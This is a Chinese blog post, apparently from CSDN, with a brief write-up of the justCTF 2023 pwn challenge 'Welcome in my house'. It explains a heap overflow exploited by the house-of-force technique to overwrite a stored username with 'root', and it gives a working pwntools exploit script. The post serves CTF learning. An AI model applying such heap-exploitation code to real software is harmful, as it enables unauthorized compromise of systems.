justctf 2023 pwn Welcome in my house

最新推荐文章于 2023-06-12 16:19:01 发布
最新推荐文章于 2023-06-12 16:19:01 发布
阅读量141 收藏
点赞数 1
分类专栏: wp 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/131135306
版权
文章描述了一个CTF挑战,其中涉及堆溢出漏洞。用户可以申请任意大小的空间,通过houseofforce技术修改adminchunk为root,从而获取flag。文章提供了利用这个漏洞的Python脚本,包括使用pwn库进行远程或本地连接,以及GDB调试步骤。
摘要由CSDN通过智能技术生成

justctf 2023 pwn Welcome in my house

在这里插入图片描述
堆溢出,可以申请任意大小的size,所以可以使用house of force
在这里插入图片描述
然后这里user需要为root才可以得到flag,user默认是admin并存放在一个chunk里,但是可以利用house of force申请到存放user的chunk那里,改成root,最后2即可得到flag

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './house'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote()
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def dbgg():
    raw_input()

menu = '>> '

dbgg()
r.sendlineafter(menu, '1')
r.sendlineafter('Enter username: ', 'z1r0')

p1 = b'root'.ljust(0x10, b'\x00') + p64(0) + p64(0xFFFFFFFFFFFFFFFF)
r.sendlineafter('Enter password: ', p1)

r.sendlineafter('Enter disk space: \n', str(-0xa0))
r.sendlineafter(menu, '2')

r.interactive()
z1r0.
关注
专栏目录
2020 JUSTCTF F@k3 0ff1c@l REVERSE WP
m0_51328323的博客
12-13 2345
1. 下载附件,点开一看 丢进exeinfope,是个64位的 打开ida64,shift+f12,搜索字符串 2. 应该是非预期解(我大概也没有哪个题是预期解 做题参考博文: https://blog.csdn.net/xiangshangbashaonian/article/details/83476084?utm_source=app (此处感谢安卓出题人,同样也是这道题的出题人,让孩子去你的博客找base64解法,没找到,却找到了这题的解法) 以下是反编译的代码
pwn工具箱之house of force
jmp esp
07-03 981
house of force基本信息 利用类型:堆利用 堆利用类型:top chunk相关 利用思想:通过修改top chunk大小,使得分配任意大小都是从top chunk里边切出来,这样分配一个大小占满想要写的位置和当前分配位置top chunk的差,下一个分配就可以分配出想要写的位置 利用难点 需要有办法能够更改到top chunk大小 需要能够知道当前位置和要写位置的差值 需要能够自由控制将
实验吧CTF逆向题目Just Click题解
iqiqiya的博客
12-29 1300
题目如下: 运行程序: 结合第一张题目提示已经能够猜到 是按一定的顺序点击1,2,3,4四个按钮就好 先来查下壳 这是个什么鬼 没见过的壳 我再试试  发现是.NET的程序 那就上这个  随便点开几个看看 结果发现关键代码 发现这个数组后 没看代码 直接按照刚才想的按顺序点击1,3,4,2,1,2,3,4 就得到了flag
攻防世界PWNWelpwn题解
seaaseesa的博客
11-06 1580
首先用IDA查看 发现主函数不能栈溢出,我们看看echo这个函数 echo会把主函数输入的字符串复制到局部的s2里,并且s2只有16字节,可以造成溢出。Echo函数先循环复制字符到s2,如果遇到0,就结束复制,然后输出s2。因此,我们如果想直接覆盖函数返回地址,那么我们的目标函数必须没有参数,否则,我们用p64(…)包装地址时,必然会出现0。 比如我们的payload为payload...
JUSTCTF校赛安卓wp
寻梦&之璐
12-11 1551
前两道wp来自于一位强大的师傅,她特意叮嘱不署名,在此表示感谢!十分感谢 寻梦 a.打开题目后 b.看到此提示后,需要把显示出来的base64编码解码 C.再次填入xunmeng,就看到了flag JUST{re_is_so_interesting} 寻梦S a.随便输入后,给了无关的提示,需要动用反编译工具jeb b.反编译查了一下,找到主要加密代码 public void onClick(View arg11) { int v0 = 18; int
justCTF [*] 2020部分题目复现
m0re's blog
02-07 1222
这个偶然间看到的一个比赛。复现一下。 Sanity Check The flag is somewhere on our website. The attachment might guide you. https://www.youtube.com/watch?v=CM3jcGsS0Po 访问链接,可以看到视频的名称,是“Take That - Rule The World (Official Video)”rule是重点,所以flag就在规则里面。 Forgotten name We forgo
A pwn challenge in 2022 美团高校赛 .zip
11-09
美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考 美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考 美赛竞赛资源,竞赛解决方案,包含完整源码解决方案...
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
pwn-my:基于 iOS 14.5 WebKitSafari 的越狱
07-24
pwn-my 由 RPwnage 和 Manticore 团队制作的基于 iOS 14.5 WebKit/Safari 的越狱 Manticore-Web 即将推出 高度在制品 Current Exploit 仅适用于 iOS 14.5+,因为它利用了 audioworklet 中的漏洞。 + 还因为目前还...
justctf-2020:justCTF [*] 2020挑战来源
05-11
justCTF [*] 2020年 此回购包含主持的 挑战的。 TLDR:使用./run.sh进行挑战(需要Docker / docker-compose,并且可能需要sudo因为我们在nsjail广泛使用nsjail )。 包含具有以下结构的目录: README.md在CTF期间使用的官方挑战说明 run.sh用于在本地运行挑战的shell脚本(使用Docker,有时使用docker-compose) public/ -公开/要下载的文件 private/ -来源和其他未列出的文件 flag.txt / metadata.json标志(不在那儿看吗?) solv/ -具有原始解决方案的脚本和文件(由healthcheck使用,如果存在) 其他文件 挑战性 类别 名称 点数 解决 网路 406 6 网路 394 7 网路 333 14 网路 256 30
justctf 2023 pwn nucleus
z1r0的博客
06-12 133
在decompress中如果是$24a,那么会自动补上24个a,并且后面可以继续增加想要的东西,此时这里存在堆溢出漏洞。堆溢出+uaf打hook为ogg即可。
2020 JUSTCTF 算法题解
Valour616的博客
12-14 441
JUSTCTF 算法题解 小汪钓鱼 这题还是挺有意思的,谁知道网上还有源码,这波大意了啊,没有验题(逃)! 出题人背锅o( ̄┰ ̄*)ゞ 题目概述 你听说过小猫钓鱼吗?那你一定能会做小汪钓鱼! 两个人一开始各有一摞牌,然后轮流着拿自己那一摞的最顶上的牌,一张接着一张放到公共的牌池里,如果遇到之前有和这一张上的数字相同的牌,就把这两张牌包括起来的所有牌都放到自己牌堆的底部(拿取的顺序为从刚刚放的那张牌开始,一张一张放到自己牌堆的底部,直到拿掉以前那张数字相同的为止)。 小猫在和小汪正在玩这个游戏,可是随着牌
2018网(PWN)鼎杯第一场解题记录(Writeup)
热门推荐
SWEET0SWAT的博客
08-21 1万+
MISC   clip     使用十六进制查看软件打开,查找的过程中发现有idat头:       还有一处在下方,表示还有另一张图片      但是这里缺少头部需要手动补充上去再另存文件:      一共提取出两张图片,但是图片明显被处理过了         其实不明白出题人为什么要弄成这样,CTF比赛还要弄成这样纯粹就是刁难,弄得眼睛贼疼。   minified...
攻防世界-PWN进阶区-welpwn(RCTF-2015)
weixin_44145820的博客
02-27 1071
题目分析 首先看一下开了哪些保护 因为开了NX,所以考虑使用ROP或者return-into-libc 用IDApro分析一下源代码 可以看出main函数中不存在注入点,我们看一下echo函数 在eho函数中,缓冲区至分配了0x10大小,但是传入的buf有0x400字节,因此可以看出存在溢出 不过拷贝遇到\x00就停止了,这个时候我们只能注入一个返回地址。 但是在ROPgadget里面能找到...
JUSTCTF2020 新生赛(校内)wp
laffey的博客
12-10 2930
JUSTCTF2020 Crypto&Misc wp Crypto 1.Crypto Sign IN 打开附件可以得到如下的颜文字 ゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚
ctf题库-Just Click
miko2018的博客
08-21 2919
<题目> 拿到答案需要正确地点击按钮 格式:simCTF{ } 解题链接: http://ctf5.shiyanbar.com/re/rev4.exe <解答> 根据连接可知这是一个exe文件。打开连接下载文件。 ※拿到题目,随便点击按钮,发现没有任何反应。 多次点击后,程序退出。 因此可分析只有按照正确顺序点击才能得到正确答案。 ※我们再次打开程序,...
CTF-RE-JustRE (2019第三届强网杯)
SuperGate的博客
06-06 1491
首先IDA点开进行静态分析: 发现判断函数sub_401610,点进去看之后发现很长一串……前面比较好说,是将前8位字符变hex放入eax寄存器中,第9,10位变hex放入ch(还是dh?)中 然后再往下面拉,可以看到很多SSE指令集,但是不是很复杂,网上可以搜到,发现都是一些比较基础数位操作。 这个地方的v27在后面会频繁用到,值为第9,10位变hex后的128位填充 这里是对...
2023 羊城杯 pwn
最新发布
01-02
2023年的羊城杯pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值